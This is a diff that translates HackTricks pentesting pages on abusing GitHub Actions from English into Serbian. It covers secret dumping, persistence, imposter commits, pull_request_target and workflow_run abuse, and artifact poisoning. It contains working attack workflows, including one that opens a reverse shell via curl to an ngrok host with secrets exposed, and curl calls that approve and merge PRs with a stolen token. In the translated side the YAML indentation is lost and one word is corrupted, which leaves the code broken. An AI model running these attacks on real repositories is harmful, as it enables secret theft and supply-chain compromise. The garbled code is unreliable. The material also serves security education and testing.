(or modifying one). - -Note, that you might find the edge case where **all the branches are protected** (via wildcard `*`) it's specified **who can push code to the branches** (_you can specify that in the branch protection_) and **your user isn't allowed**. You can still run a custom github action because you can create a branch and use the push trigger over itself. The **branch protection allows the push to a new branch so the github action will be triggered**. +U slučaju da se okruženje može **pristupiti sa svih grana**, **nije zaštićeno** i možete lako pristupiti tajnama unutar okruženja. Imajte na umu da možete pronaći repozitorijume gde su **sve grane zaštićene** (specifikovanjem njihovih imena ili korišćenjem `*`), u tom scenariju, **pronađite granu u kojoj možete poslati kod** i možete **izvući** tajne kreirajući novu github akciju (ili modifikujući jednu). +Napomena, možete naići na ivicu slučaja gde su **sve grane zaštićene** (putem wildcard `*`) i specificirano je **ko može slati kod u grane** (_to možete specificirati u zaštiti grane_) i **vašem korisniku nije dozvoljeno**. I dalje možete pokrenuti prilagođenu github akciju jer možete kreirati granu i koristiti okidač za slanje preko nje same. **Zaštita grane dozvoljava slanje u novu granu, tako da će github akcija biti aktivirana**. ```yaml push: # Run it when a push is made to a branch - branches: - - current_branch_name #Use '**' to run when a push is made to any branch +branches: +- current_branch_name #Use '**' to run when a push is made to any branch ``` +Napomena da će se **nakon kreiranja** grane **zaštita grane primeniti na novu granu** i nećete moći da je izmenite, ali do tada ćete već izvući tajne. -Note that **after the creation** of the branch the **branch protection will apply to the new branch** and you won't be able to modify it, but for that time you will have already dumped the secrets. +## Persistencija -## Persistence +- Generišite **korisnički token** +- Ukradite **github tokene** iz **tajni** +- **Brisanje** rezultata **workflow-a** i **grana** +- Dajte **više dozvola celoj organizaciji** +- Kreirajte **webhook-ove** za exfiltraciju informacija +- Pozovite **spoljašnje saradnike** +- **Uklonite** **webhook-ove** koje koristi **SIEM** +- Kreirajte/izmenite **Github Action** sa **bekdoor-om** +- Pronađite **ranjivu Github Action za injekciju komandi** putem **modifikacije** vrednosti **tajne** -- Generate **user token** -- Steal **github tokens** from **secrets** - - **Deletion** of workflow **results** and **branches** -- Give **more permissions to all the org** -- Create **webhooks** to exfiltrate information -- Invite **outside collaborators** -- **Remove** **webhooks** used by the **SIEM** -- Create/modify **Github Action** with a **backdoor** -- Find **vulnerable Github Action to command injection** via **secret** value modification +### Impostor Commit-ovi - Bekdoor putem repo commit-ova -### Imposter Commits - Backdoor via repo commits - -In Github it's possible to **create a PR to a repo from a fork**. Even if the PR is **not accepted**, a **commit** id inside the orginal repo is going to be created for the fork version of the code. Therefore, an attacker **could pin to use an specific commit from an apparently ligit repo that wasn't created by the owner of the repo**. - -Like [**this**](https://github.com/actions/checkout/commit/c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e): +U Github-u je moguće **napraviti PR za repo iz forka**. Čak i ako PR **nije prihvaćen**, **commit** id unutar originalnog repoa će biti kreiran za fork verziju koda. Stoga, napadač **može da se oslanja na korišćenje specifičnog commit-a iz naizgled legitimnog repoa koji nije kreirao vlasnik repoa**. +Kao [**ovaj**](https://github.com/actions/checkout/commit/c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e): ```yaml name: example on: [push] jobs: - commit: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e - - shell: bash - run: | - echo 'hello world!' +commit: +runs-on: ubuntu-latest +steps: +- uses: actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e +- shell: bash +run: | +echo 'hello world!' ``` - -For more info check [https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd](https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd) +Za više informacija proverite [https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd](https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md index c5ce0467b..470efff7b 100644 --- a/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md +++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md @@ -4,389 +4,371 @@ ## Basic Information -In this page you will find: +Na ovoj stranici ćete pronaći: -- A **summary of all the impacts** of an attacker managing to access a Github Action -- Different ways to **get access to an action**: - - Having **permissions** to create the action - - Abusing **pull request** related triggers - - Abusing **other external access** techniques - - **Pivoting** from an already compromised repo -- Finally, a section about **post-exploitation techniques to abuse an action from inside** (cause the mentioned impacts) +- **rezime svih uticaja** napadača koji uspe da pristupi Github Action +- Različite načine za **pristup akciji**: +- Imajući **dozvole** za kreiranje akcije +- Zloupotreba **okidača** povezanih sa pull request-om +- Zloupotreba **drugih tehnika spoljnog pristupa** +- **Pivotiranje** iz već kompromitovanog repozitorijuma +- Na kraju, odeljak o **tehnikama post-eksploatacije za zloupotrebu akcije iznutra** (uzrokovanje pomenutih uticaja) ## Impacts Summary -For an introduction about [**Github Actions check the basic information**](../basic-github-information.md#github-actions). +Za uvod o [**Github Actions proverite osnovne informacije**](../basic-github-information.md#github-actions). -If you can **execute arbitrary code in GitHub Actions** within a **repository**, you may be able to: +Ako možete **izvršiti proizvoljni kod u GitHub Actions** unutar **repozitorijuma**, možda ćete moći da: -- **Steal secrets** mounted to the pipeline and **abuse the pipeline's privileges** to gain unauthorized access to external platforms, such as AWS and GCP. -- **Compromise deployments** and other **artifacts**. - - If the pipeline deploys or stores assets, you could alter the final product, enabling a supply chain attack. -- **Execute code in custom workers** to abuse computing power and pivot to other systems. -- **Overwrite repository code**, depending on the permissions associated with the `GITHUB_TOKEN`. +- **Uk盗ite tajne** montirane na pipeline i **zloupotrebite privilegije pipeline-a** da dobijete neovlašćen pristup spoljnim platformama, kao što su AWS i GCP. +- **Komprimujete implementacije** i druge **artefakte**. +- Ako pipeline implementira ili skladišti resurse, mogli biste izmeniti konačni proizvod, omogućavajući napad na lanac snabdevanja. +- **Izvršite kod u prilagođenim radnicima** da zloupotrebite računske resurse i pivotirate na druge sisteme. +- **Prepišete kod repozitorijuma**, u zavisnosti od dozvola povezanih sa `GITHUB_TOKEN`. ## GITHUB_TOKEN -This "**secret**" (coming from `${{ secrets.GITHUB_TOKEN }}` and `${{ github.token }}`) is given when the admin enables this option: +Ova "**tajna**" (koja dolazi iz `${{ secrets.GITHUB_TOKEN }}` i `${{ github.token }}`) se daje kada administrator omogući ovu opciju:
-This token is the same one a **Github Application will use**, so it can access the same endpoints: [https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps) +Ovaj token je isti koji će **Github aplikacija koristiti**, tako da može pristupiti istim krajnjim tačkama: [https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps) > [!WARNING] -> Github should release a [**flow**](https://github.com/github/roadmap/issues/74) that **allows cross-repository** access within GitHub, so a repo can access other internal repos using the `GITHUB_TOKEN`. +> Github bi trebao da objavi [**tok**](https://github.com/github/roadmap/issues/74) koji **omogućava međurepozitorijumski** pristup unutar GitHub-a, tako da repo može pristupiti drugim internim repozitorijumima koristeći `GITHUB_TOKEN`. -You can see the possible **permissions** of this token in: [https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token) +Možete videti moguće **dozvole** ovog tokena na: [https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token) -Note that the token **expires after the job has completed**.\ -These tokens looks like this: `ghs_veaxARUji7EXszBMbhkr4Nz2dYz0sqkeiur7` +Napomena da token **isteče nakon što je posao završen**.\ +Ovi tokeni izgledaju ovako: `ghs_veaxARUji7EXszBMbhkr4Nz2dYz0sqkeiur7` -Some interesting things you can do with this token: +Neke zanimljive stvari koje možete uraditi sa ovim tokenom: {{#tabs }} {{#tab name="Merge PR" }} - ```bash # Merge PR curl -X PUT \ - https://api.github.com/repos///pulls//merge \ - -H "Accept: application/vnd.github.v3+json" \ - --header "authorization: Bearer $GITHUB_TOKEN" \ - --header "content-type: application/json" \ - -d "{\"commit_title\":\"commit_title\"}" +https://api.github.com/repos///pulls//merge \ +-H "Accept: application/vnd.github.v3+json" \ +--header "authorization: Bearer $GITHUB_TOKEN" \ +--header "content-type: application/json" \ +-d "{\"commit_title\":\"commit_title\"}" ``` - {{#endtab }} -{{#tab name="Approve PR" }} - +{{#tab name="Odobri PR" }} ```bash # Approve a PR curl -X POST \ - https://api.github.com/repos///pulls//reviews \ - -H "Accept: application/vnd.github.v3+json" \ - --header "authorization: Bearer $GITHUB_TOKEN" \ - --header 'content-type: application/json' \ - -d '{"event":"APPROVE"}' +https://api.github.com/repos///pulls//reviews \ +-H "Accept: application/vnd.github.v3+json" \ +--header "authorization: Bearer $GITHUB_TOKEN" \ +--header 'content-type: application/json' \ +-d '{"event":"APPROVE"}' ``` - {{#endtab }} -{{#tab name="Create PR" }} - +{{#tab name="Kreiraj PR" }} ```bash # Create a PR curl -X POST \ - -H "Accept: application/vnd.github.v3+json" \ - --header "authorization: Bearer $GITHUB_TOKEN" \ - --header 'content-type: application/json' \ - https://api.github.com/repos///pulls \ - -d '{"head":"","base":"master", "title":"title"}' +-H "Accept: application/vnd.github.v3+json" \ +--header "authorization: Bearer $GITHUB_TOKEN" \ +--header 'content-type: application/json' \ +https://api.github.com/repos///pulls \ +-d '{"head":"","base":"master", "title":"title"}' ``` - {{#endtab }} {{#endtabs }} > [!CAUTION] -> Note that in several occasions you will be able to find **github user tokens inside Github Actions envs or in the secrets**. These tokens may give you more privileges over the repository and organization. +> Imajte na umu da ćete u nekoliko slučajeva moći da pronađete **github korisničke tokene unutar Github Actions envs ili u tajnama**. Ovi tokeni vam mogu dati više privilegija nad repozitorijumom i organizacijom.
-List secrets in Github Action output - +Lista tajni u Github Action izlazu ```yaml name: list_env on: - workflow_dispatch: # Launch manually - pull_request: #Run it when a PR is created to a branch - branches: - - "**" - push: # Run it when a push is made to a branch - branches: - - "**" +workflow_dispatch: # Launch manually +pull_request: #Run it when a PR is created to a branch +branches: +- "**" +push: # Run it when a push is made to a branch +branches: +- "**" jobs: - List_env: - runs-on: ubuntu-latest - steps: - - name: List Env - # Need to base64 encode or github will change the secret value for "***" - run: sh -c 'env | grep "secret_" | base64 -w0' - env: - secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} - secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} +List_env: +runs-on: ubuntu-latest +steps: +- name: List Env +# Need to base64 encode or github will change the secret value for "***" +run: sh -c 'env | grep "secret_" | base64 -w0' +env: +secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} +secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} ``` -
-Get reverse shell with secrets - +Dobijanje reverzne ljuske sa tajnama ```yaml name: revshell on: - workflow_dispatch: # Launch manually - pull_request: #Run it when a PR is created to a branch - branches: - - "**" - push: # Run it when a push is made to a branch - branches: - - "**" +workflow_dispatch: # Launch manually +pull_request: #Run it when a PR is created to a branch +branches: +- "**" +push: # Run it when a push is made to a branch +branches: +- "**" jobs: - create_pull_request: - runs-on: ubuntu-latest - steps: - - name: Get Rev Shell - run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh' - env: - secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} - secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} +create_pull_request: +runs-on: ubuntu-latest +steps: +- name: Get Rev Shell +run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh' +env: +secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} +secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} ``` -
-It's possible to check the permissions given to a Github Token in other users repositories **checking the logs** of the actions: +Moguće je proveriti dozvole date Github Token-u u drugim korisničkim repozitorijumima **proverom logova** akcija:
-## Allowed Execution +## Dozvoljena Izvršenja > [!NOTE] -> This would be the easiest way to compromise Github actions, as this case suppose that you have access to **create a new repo in the organization**, or have **write privileges over a repository**. +> Ovo bi bio najlakši način da se kompromituju Github akcije, jer ovaj slučaj podrazumeva da imate pristup **kreiranju novog repozitorijuma u organizaciji**, ili imate **privilegije pisanja nad repozitorijumom**. > -> If you are in this scenario you can just check the [Post Exploitation techniques](./#post-exploitation-techniques-from-inside-an-action). +> Ako ste u ovom scenariju, možete samo proveriti [Post Exploitation techniques](./#post-exploitation-techniques-from-inside-an-action). -### Execution from Repo Creation +### Izvršenje iz Kreiranja Repozitorijuma -In case members of an organization can **create new repos** and you can execute github actions, you can **create a new repo and steal the secrets set at organization level**. +U slučaju da članovi organizacije mogu **kreirati nove repozitorijume** i možete izvršavati github akcije, možete **kreirati novi repozitorijum i ukrasti tajne postavljene na nivou organizacije**. -### Execution from a New Branch +### Izvršenje iz Nove Grane -If you can **create a new branch in a repository that already contains a Github Action** configured, you can **modify** it, **upload** the content, and then **execute that action from the new branch**. This way you can **exfiltrate repository and organization level secrets** (but you need to know how they are called). - -You can make the modified action executable **manually,** when a **PR is created** or when **some code is pushed** (depending on how noisy you want to be): +Ako možete **kreirati novu granu u repozitorijumu koji već sadrži konfigurisan Github Action**, možete **modifikovati** to, **otpremiti** sadržaj, a zatim **izvršiti tu akciju iz nove grane**. Na ovaj način možete **ekstrahovati tajne na nivou repozitorijuma i organizacije** (ali morate znati kako se zovu). +Možete napraviti modifikovanu akciju izvršnom **ručno,** kada se **kreira PR** ili kada se **neki kod otpremi** (u zavisnosti od toga koliko želite da budete uočljivi): ```yaml on: - workflow_dispatch: # Launch manually - pull_request: #Run it when a PR is created to a branch - branches: - - master - push: # Run it when a push is made to a branch - branches: - - current_branch_name +workflow_dispatch: # Launch manually +pull_request: #Run it when a PR is created to a branch +branches: +- master +push: # Run it when a push is made to a branch +branches: +- current_branch_name # Use '**' instead of a branh name to trigger the action in all the cranches ``` - --- ## Forked Execution > [!NOTE] -> There are different triggers that could allow an attacker to **execute a Github Action of another repository**. If those triggerable actions are poorly configured, an attacker could be able to compromise them. +> Postoje različiti okidači koji bi mogli omogućiti napadaču da **izvrši Github akciju iz drugog repozitorijuma**. Ako su ti okidači loše konfigurisani, napadač bi mogao da ih kompromituje. ### `pull_request` -The workflow trigger **`pull_request`** will execute the workflow every time a pull request is received with some exceptions: by default if it's the **first time** you are **collaborating**, some **maintainer** will need to **approve** the **run** of the workflow: +Okidač radnog toka **`pull_request`** će izvršiti radni tok svaki put kada se primi pull request uz neke izuzetke: prema zadatku, ako je to **prvi put** da **saradjujete**, neki **održavaoc** će morati da **odobri** **izvršenje** radnog toka:
> [!NOTE] -> As the **default limitation** is for **first-time** contributors, you could contribute **fixing a valid bug/typo** and then send **other PRs to abuse your new `pull_request` privileges**. +> Kako je **podrazumevano ograničenje** za **prvake** u doprinosima, mogli biste doprineti **ispravljanjem važeće greške/pravopisne greške** i zatim poslati **druge PR-ove da zloupotrebite svoje nove `pull_request` privilegije**. > -> **I tested this and it doesn't work**: ~~Another option would be to create an account with the name of someone that contributed to the project and deleted his account.~~ +> **Testirao sam ovo i ne radi**: ~~Druga opcija bi bila da kreirate nalog sa imenom nekoga ko je doprineo projektu i obrisao njegov nalog.~~ -Moreover, by default **prevents write permissions** and **secrets access** to the target repository as mentioned in the [**docs**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflows-in-forked-repositories): +Pored toga, prema zadatku **sprečava pisane dozvole** i **pristup tajnama** ciljanom repozitorijumu kao što je pomenuto u [**dokumentaciji**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflows-in-forked-repositories): -> With the exception of `GITHUB_TOKEN`, **secrets are not passed to the runner** when a workflow is triggered from a **forked** repository. The **`GITHUB_TOKEN` has read-only permissions** in pull requests **from forked repositories**. +> Sa izuzetkom `GITHUB_TOKEN`, **tajne se ne prosleđuju izvršiocu** kada se radni tok pokrene iz **forkovanog** repozitorijuma. **`GITHUB_TOKEN` ima dozvole samo za čitanje** u pull request-ima **iz forkovanih repozitorijuma**. -An attacker could modify the definition of the Github Action in order to execute arbitrary things and append arbitrary actions. However, he won't be able to steal secrets or overwrite the repo because of the mentioned limitations. +Napadač bi mogao da izmeni definiciju Github akcije kako bi izvršio proizvoljne stvari i dodao proizvoljne akcije. Međutim, neće moći da ukrade tajne ili prepiše repozitorijum zbog pomenutih ograničenja. > [!CAUTION] -> **Yes, if the attacker change in the PR the github action that will be triggered, his Github Action will be the one used and not the one from the origin repo!** +> **Da, ako napadač promeni u PR-u github akciju koja će biti pokrenuta, njegova Github akcija će biti ta koja će se koristiti, a ne ona iz originalnog repozitorijuma!** -As the attacker also controls the code being executed, even if there aren't secrets or write permissions on the `GITHUB_TOKEN` an attacker could for example **upload malicious artifacts**. +Kako napadač takođe kontroliše kod koji se izvršava, čak i ako nema tajni ili pisanih dozvola na `GITHUB_TOKEN`, napadač bi mogao, na primer, **da otpremi zlonamerne artefakte**. ### **`pull_request_target`** -The workflow trigger **`pull_request_target`** have **write permission** to the target repository and **access to secrets** (and doesn't ask for permission). +Okidač radnog toka **`pull_request_target`** ima **pisane dozvole** za ciljani repozitorijum i **pristup tajnama** (i ne traži dozvolu). -Note that the workflow trigger **`pull_request_target`** **runs in the base context** and not in the one given by the PR (to **not execute untrusted code**). For more info about `pull_request_target` [**check the docs**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#pull_request_target).\ -Moreover, for more info about this specific dangerous use check this [**github blog post**](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/). +Napomena: okidač radnog toka **`pull_request_target`** **izvršava se u osnovnom kontekstu** i ne u onom koji daje PR (da **ne izvršava nepouzdani kod**). Za više informacija o `pull_request_target` [**proverite dokumentaciju**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#pull_request_target).\ +Pored toga, za više informacija o ovoj specifičnoj opasnoj upotrebi proverite ovaj [**github blog post**](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/). -It might look like because the **executed workflow** is the one defined in the **base** and **not in the PR** it's **secure** to use **`pull_request_target`**, but there are a **few cases were it isn't**. +Može izgledati kao da je **izvršeni radni tok** onaj definisan u **osnovi** i **ne u PR-u**, pa je **sigurno** koristiti **`pull_request_target`**, ali postoje **neki slučajevi kada to nije**. -An this one will have **access to secrets**. +A ovaj će imati **pristup tajnama**. ### `workflow_run` -The [**workflow_run**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflow_run) trigger allows to run a workflow from a different one when it's `completed`, `requested` or `in_progress`. - -In this example, a workflow is configured to run after the separate "Run Tests" workflow completes: +Okidač [**workflow_run**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflow_run) omogućava pokretanje radnog toka iz drugog kada je `završen`, `tražen` ili `u toku`. +U ovom primeru, radni tok je konfiguran da se izvrši nakon što se završi odvojeni "Pokreni testove" radni tok: ```yaml on: - workflow_run: - workflows: [Run Tests] - types: - - completed +workflow_run: +workflows: [Run Tests] +types: +- completed ``` +Moreover, according to the docs: Workflow pokrenut događajem `workflow_run` može **pristupiti tajnama i pisati tokene, čak i ako prethodni workflow nije**. -Moreover, according to the docs: The workflow started by the `workflow_run` event is able to **access secrets and write tokens, even if the previous workflow was not**. - -This kind of workflow could be attacked if it's **depending** on a **workflow** that can be **triggered** by an external user via **`pull_request`** or **`pull_request_target`**. A couple of vulnerable examples can be [**found this blog**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability)**.** The first one consist on the **`workflow_run`** triggered workflow downloading out the attackers code: `${{ github.event.pull_request.head.sha }}`\ -The second one consist on **passing** an **artifact** from the **untrusted** code to the **`workflow_run`** workflow and using the content of this artifact in a way that makes it **vulnerable to RCE**. +Ova vrsta workflow-a može biti napadnuta ako **zavisi** od **workflow-a** koji može biti **pokrenut** od strane spoljnog korisnika putem **`pull_request`** ili **`pull_request_target`**. Nekoliko ranjivih primera može se [**pronaći u ovom blogu**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability)**.** Prvi se sastoji od **`workflow_run`** pokrenutog workflow-a koji preuzima napadačev kod: `${{ github.event.pull_request.head.sha }}`\ +Drugi se sastoji od **prosleđivanja** **artifact-a** iz **nepouzdanog** koda u **`workflow_run`** workflow i korišćenja sadržaja ovog artifact-a na način koji ga čini **ranjivim na RCE**. ### `workflow_call` TODO -TODO: Check if when executed from a pull_request the used/downloaded code if the one from the origin or from the forked PR +TODO: Proveriti da li kada se izvršava iz pull_request-a korišćeni/preuzeti kod dolazi iz originala ili iz forkovanog PR-a -## Abusing Forked Execution +## Zloupotreba Forkovane Izvršavanja -We have mentioned all the ways an external attacker could manage to make a github workflow to execute, now let's take a look about how this executions, if bad configured, could be abused: +Pomenuli smo sve načine na koje spoljašnji napadač može uspeti da pokrene github workflow, sada hajde da pogledamo kako ove izvršavanja, ako su loše konfigurisane, mogu biti zloupotrebljene: -### Untrusted checkout execution +### Nepouzdan checkout izvršavanje -In the case of **`pull_request`,** the workflow is going to be executed in the **context of the PR** (so it'll execute the **malicious PRs code**), but someone needs to **authorize it first** and it will run with some [limitations](./#pull_request). +U slučaju **`pull_request`,** workflow će biti izvršen u **kontekstu PR-a** (tako da će izvršiti **maliciozni kod PR-a**), ali neko mora prvo da **autorizuje** i biće izvršen sa nekim [ograničenjima](./#pull_request). -In case of a workflow using **`pull_request_target` or `workflow_run`** that depends on a workflow that can be triggered from **`pull_request_target` or `pull_request`** the code from the original repo will be executed, so the **attacker cannot control the executed code**. +U slučaju workflow-a koji koristi **`pull_request_target` ili `workflow_run`** koji zavisi od workflow-a koji može biti pokrenut iz **`pull_request_target` ili `pull_request`**, kod iz originalnog repozitorijuma će biti izvršen, tako da **napadač ne može kontrolisati izvršeni kod**. > [!CAUTION] -> However, if the **action** has an **explicit PR checkou**t that will **get the code from the PR** (and not from base), it will use the attackers controlled code. For example (check line 12 where the PR code is downloaded): +> Međutim, ako **akcija** ima **eksplicitni PR checkout** koji će **uzeti kod iz PR-a** (a ne iz osnove), koristiće napadačev kontrolisani kod. Na primer (proverite liniju 12 gde se preuzima kod PR-a): -
# INSECURE. Provided as an example only.
+
# INSECURE. Pruženo samo kao primer.
 on:
-  pull_request_target
+pull_request_target
 
 jobs:
-  build:
-    name: Build and test
-    runs-on: ubuntu-latest
-    steps:
+build:
+name: Build and test
+runs-on: ubuntu-latest
+steps:
     - uses: actions/checkout@v2
       with:
         ref: ${{ github.event.pull_request.head.sha }}
 
-    - uses: actions/setup-node@v1
-    - run: |
-        npm install
-        npm build
+- uses: actions/setup-node@v1
+- run: |
+npm install
+npm build
 
-    - uses: completely/fakeaction@v2
-      with:
-        arg1: ${{ secrets.supersecret }}
+- uses: completely/fakeaction@v2
+with:
+arg1: ${{ secrets.supersecret }}
 
-    - uses: fakerepo/comment-on-pr@v1
-      with:
-        message: |
-          Thank you!
+- uses: fakerepo/comment-on-pr@v1
+with:
+message: |
+Hvala!
 

 
-The potentially **untrusted code is being run during `npm install` or `npm build`** as the build scripts and referenced **packages are controlled by the author of the PR**.
+Potencijalno **nepouzdan kod se izvršava tokom `npm install` ili `npm build`** jer su skripte za izgradnju i referencirane **pakete pod kontrolom autora PR-a**.
 
 > [!WARNING]
-> A github dork to search for vulnerable actions is: `event.pull_request pull_request_target extension:yml` however, there are different ways to configure the jobs to be executed securely even if the action is configured insecurely (like using conditionals about who is the actor generating the PR).
+> Github dork za pretragu ranjivih akcija je: `event.pull_request pull_request_target extension:yml` međutim, postoje različiti načini za konfiguraciju poslova da se izvršavaju sigurno čak i ako je akcija konfigurisana nesigurno (kao što je korišćenje uslovnih izraza o tome ko je akter koji generiše PR).
 
-### Context Script Injections 
+### Kontekst Injekcije Skripti 
 
-Note that there are certain [**github contexts**](https://docs.github.com/en/actions/reference/context-and-expression-syntax-for-github-actions#github-context) whose values are **controlled** by the **user** creating the PR. If the github action is using that **data to execute anything**, it could lead to **arbitrary code execution:**
+Napomena da postoje određeni [**github konteksti**](https://docs.github.com/en/actions/reference/context-and-expression-syntax-for-github-actions#github-context) čije vrednosti su **kontrolisane** od strane **korisnika** koji kreira PR. Ako github akcija koristi te **podatke za izvršavanje bilo čega**, to može dovesti do **izvršavanja proizvoljnog koda:**
 
 {{#ref}}
 gh-actions-context-script-injections.md
 {{#endref}}
 
-### **GITHUB_ENV Script Injection** 
+### **GITHUB_ENV Injekcija Skripti** 
 
-From the docs: You can make an **environment variable available to any subsequent steps** in a workflow job by defining or updating the environment variable and writing this to the **`GITHUB_ENV`** environment file.
+Iz dokumenata: Možete učiniti **promenljivu okruženja dostupnom za sve naredne korake** u workflow poslu tako što ćete definisati ili ažurirati promenljivu okruženja i napisati to u **`GITHUB_ENV`** datoteku okruženja.
 
-If an attacker could **inject any value** inside this **env** variable, he could inject env variables that could execute code in following steps such as **LD_PRELOAD** or **NODE_OPTIONS**.
+Ako bi napadač mogao **ubaciti bilo koju vrednost** unutar ove **env** promenljive, mogao bi ubaciti env promenljive koje bi mogle izvršiti kod u narednim koracima kao što su **LD_PRELOAD** ili **NODE_OPTIONS**.
 
-For example ([**this**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability-0) and [**this**](https://www.legitsecurity.com/blog/-how-we-found-another-github-action-environment-injection-vulnerability-in-a-google-project)), imagine a workflow that is trusting an uploaded artifact to store its content inside **`GITHUB_ENV`** env variable. An attacker could upload something like this to compromise it:
+Na primer ([**ovo**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability-0) i [**ovo**](https://www.legitsecurity.com/blog/-how-we-found-another-github-action-environment-injection-vulnerability-in-a-google-project)), zamislite workflow koji veruje da je učitani artifact da čuva svoj sadržaj unutar **`GITHUB_ENV`** env promenljive. Napadač bi mogao da učita nešto poput ovoga da bi ga kompromitovao:
 
 

 
-### Vulnerable Third Party Github Actions
+### Ranjive Treće Strane Github Akcije
 
 #### [dawidd6/action-download-artifact](https://github.com/dawidd6/action-download-artifact)
 
-As mentioned in [**this blog post**](https://www.legitsecurity.com/blog/github-actions-that-open-the-door-to-cicd-pipeline-attacks), this Github Action allows to access artifacts from different workflows and even repositories.
+Kao što je pomenuto u [**ovom blog postu**](https://www.legitsecurity.com/blog/github-actions-that-open-the-door-to-cicd-pipeline-attacks), ova Github Akcija omogućava pristup artifact-ima iz različitih workflow-a i čak repozitorijuma.
 
-The thing problem is that if the **`path`** parameter isn't set, the artifact is extracted in the current directory and it can override files that could be later used or even executed in the workflow. Therefore, if the Artifact is vulnerable, an attacker could abuse this to compromise other workflows trusting the Artifact.
-
-Example of vulnerable workflow:
+Problem je u tome što ako **`path`** parametar nije postavljen, artifact se ekstrahuje u trenutni direktorijum i može prepisati datoteke koje bi kasnije mogle biti korišćene ili čak izvršene u workflow-u. Stoga, ako je Artifact ranjiv, napadač bi mogao da zloupotrebi ovo da kompromituje druge workflow-e koji veruju Artifact-u.
 
+Primer ranjivog workflow-a:
 ```yaml
 on:
-  workflow_run:
-    workflows: ["some workflow"]
-    types:
-      - completed
+workflow_run:
+workflows: ["some workflow"]
+types:
+- completed
 
 jobs:
-  success:
-    runs-on: ubuntu-latest
-    steps:
-      - uses: actions/checkout@v2
-      - name: download artifact
-        uses: dawidd6/action-download-artifact
-        with:
-          workflow: ${{ github.event.workflow_run.workflow_id }}
-          name: artifact
-      - run: python ./script.py
-        with:
-          name: artifact
-          path: ./script.py
+success:
+runs-on: ubuntu-latest
+steps:
+- uses: actions/checkout@v2
+- name: download artifact
+uses: dawidd6/action-download-artifact
+with:
+workflow: ${{ github.event.workflow_run.workflow_id }}
+name: artifact
+- run: python ./script.py
+with:
+name: artifact
+path: ./script.py
 ```
-
-This could be attacked with this workflow:
-
+Ovo bi moglo biti napadnuto ovim radnim tokom:
 ```yaml
 name: "some workflow"
 on: pull_request
 
 jobs:
-    upload:
-        runs-on: ubuntu-latest
-        steps:
-            - run: echo "print('exploited')" > ./script.py
-            - uses actions/upload-artifact@v2
-              with:
-                name: artifact
-                path: ./script.py
+upload:
+runs-on: ubuntu-latest
+steps:
+- run: echo "print('exploited')" > ./script.py
+- uses actions/upload-artifact@v2
+with:
+name: artifact
+path: ./script.py
 ```
-
 ---
 
-## Other External Access
+## Drugi Spoljni Pristup
 
-### Deleted Namespace Repo Hijacking
+### Otimanje Izbrisanog Namespace Repozitorijuma
 
-If an account changes it's name another user could register an account with that name after some time. If a repository had **less than 100 stars previously to the change of nam**e, Github will allow the new register user with the same name to create a **repository with the same name** as the one deleted.
+Ako nalog promeni svoje ime, drugi korisnik bi mogao da registruje nalog sa tim imenom nakon nekog vremena. Ako je repozitorijum imao **manje od 100 zvezdica pre promene imena**, Github će omogućiti novom registrovanom korisniku sa istim imenom da kreira **repozitorijum sa istim imenom** kao onaj koji je izbrisan.
 
 > [!CAUTION]
-> So if an action is using a repo from a non-existent account, it's still possible that an attacker could create that account and compromise the action.
+> Dakle, ako neka akcija koristi repozitorijum sa nepostojećeg naloga, još uvek je moguće da napadač može da kreira taj nalog i kompromituje akciju.
 
-If other repositories where using **dependencies from this user repos**, an attacker will be able to hijack them Here you have a more complete explanation: [https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/](https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/)
